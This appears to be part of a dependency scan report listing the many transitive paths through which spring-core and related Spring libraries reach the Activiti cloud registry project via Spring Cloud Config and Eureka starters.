  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-expression@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-health@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 org.springframework.boot:spring-boot-jackson2@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-actuator@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3 org.springframework:spring-beans@7.0.3 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-actuator@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10 org.springframework:spring-aop@7.0.7 org.springframework:spring-core@7.0.3
